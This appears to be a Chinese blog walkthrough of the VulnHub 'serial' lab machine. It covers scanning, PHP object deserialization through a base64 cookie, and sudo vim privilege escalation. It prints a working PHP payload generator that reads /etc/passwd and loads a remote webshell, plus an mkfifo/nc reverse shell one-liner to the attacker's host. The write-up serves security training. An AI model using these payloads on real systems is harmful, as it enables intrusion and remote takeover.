serial靶场

项目地址

https://download.vulnhub.com/serial/serial.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用C段扫描,获取靶机IP地址

arp-scan -l

扫描一下端口

nmap -sV -p- 192.168.48.149

查看一下80端口和22端口

目录扫描一下

dirb http://192.168.48.149

发现这个目录下有文件下载一下

index.php文件中包含user.class.php文件且对cookie中的user参数进行了序列化和base64编码

user.class.php文件包含log.class.php文件且定义了Welcome和User两个类并调用了log.class.php文件中的handler函数

log.class.php定义了Log类和成员变量type_log且handler函数对变量进行了文件包含和输出

没有得到太多有用信息

访问原网站,用Burpsuite抓包查看cookie

由刚才三个文件可知这是base64编码

进行解码

构造payload,尝试读取passwd文件

我这边用了一个小Pwww目录下的1.php(我当时用在线编码不行出不来)

///可以写在任意目录下,要ip+地址/1.php

<?php
  class Log {
    private $type_log = "/etc/passwd";
  }
 
  class User {
    private $name = "admin";
    private $wel;
 
    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));

发现除了root还有sk4可以登陆(/bin/basn)

想办法获取shell

在小p下写了一个1.txt木马

将1php内容修改为ip/1.txt

获得编码后的代码

更换抓包后的cooker得到200

输入?cmd=id

在Kali开启一个监听

反弹shell

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.48.130+8888+>/tmp/f

没有反应但是反弹成功了

提权

查看系统版本内核

在根目录发现一个txt.bak文件

查看一下

获得了sk4的登录账号和密码因为之前扫出来有22端口开放

使用远程连接

登陆成功

尝试进入root模式

失败了

试试sudo vim 进入命令模式输入!bash

提权成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值